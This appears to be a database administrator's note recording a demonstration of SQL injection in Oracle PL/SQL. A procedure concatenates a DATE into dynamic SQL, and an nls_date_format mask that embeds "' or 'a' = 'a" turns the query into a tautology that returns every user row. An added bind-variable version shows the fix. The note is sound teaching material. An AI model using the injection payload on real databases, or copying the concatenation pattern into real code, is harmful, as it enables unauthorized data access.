[20170912]sql injection example.txt

--//An example from Tom, kept here as a record. It may be needed for an explanation later!!

1. Environment:
SCOTT@book> @ &r/ver1

PORT_STRING                    VERSION        BANNER
------------------------------ -------------- --------------------------------------------------------------------------------
x86_64/Linux 2.4.xx            11.2.0.4.0     Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production

create or replace procedure inj( p_date in date )
as
        l_rec   all_users%rowtype;
        c       sys_refcursor;
        l_query long;
begin
        l_query := '
        select *
          from all_users
         where created = ''' ||p_date ||'''';

        dbms_output.put_line( l_query );
        open c for l_query;

        for i in 1 .. 5
        loop
                fetch c into l_rec;
                exit when c%notfound;
                dbms_output.put_line( l_rec.username || '.....' );
        end loop;
        close c;
end;
/

SCOTT@book> show parameter nls_date_format
NAME             TYPE    VALUE
---------------- ------- ---------------------
nls_date_format  string  YYYY-MM-DD HH24:MI:SS

SCOTT@book> exec inj(sysdate)

        select *
          from all_users
         where created = '2017-09-12 08:47:16'
PL/SQL procedure successfully completed.
--//Note the SQL statement in the output.

2. Change the environment setting:

SCOTT@book> alter session set nls_date_format = 'yyyy-mm-dd hh24:mi:ss"'' or ''a'' = ''a"';
Session altered.

SCOTT@book> exec inj(sysdate)

        select *
          from all_users
         where created = '2017-09-12 08:48:10' or 'a' = 'a'
TEST.....
WYL.....
BI.....
PM.....
SH.....

PL/SQL procedure successfully completed.
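
The injection works because ''' || p_date || '''' implicitly converts the DATE to text using the session's nls_date_format, and double-quoted text in that format mask is copied verbatim into the statement. The following is an added example, not part of the original post, of the same procedure rewritten with a bind variable (the name inj_safe is hypothetical):

```sql
-- Added example, not from the original post. inj_safe is a hypothetical name.
create or replace procedure inj_safe( p_date in date )
as
        l_rec   all_users%rowtype;
        c       sys_refcursor;
        -- Constant statement text: nothing caller-influenced is concatenated in.
        l_query constant varchar2(200) := '
        select *
          from all_users
         where created = :p_date';
begin
        dbms_output.put_line( l_query );
        -- Explicit format mask for logging, so the session's
        -- nls_date_format cannot change what is printed.
        dbms_output.put_line( ':p_date = ' ||
                to_char( p_date, 'YYYY-MM-DD HH24:MI:SS' ) );

        -- The DATE is passed as a bind value. No implicit DATE -> VARCHAR2
        -- conversion takes place, so no text from nls_date_format
        -- ever reaches the SQL parser.
        open c for l_query using p_date;

        for i in 1 .. 5
        loop
                fetch c into l_rec;
                exit when c%notfound;
                dbms_output.put_line( l_rec.username || '.....' );
        end loop;
        close c;
end;
/

-- Same session setting as in step 2 of the post:
alter session set nls_date_format = 'yyyy-mm-dd hh24:mi:ss"'' or ''a'' = ''a"';
exec inj_safe(sysdate)
```

With the modified nls_date_format still in effect, the statement text stays a single equality predicate on created, so the or 'a' = 'a' clause never becomes part of the query.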
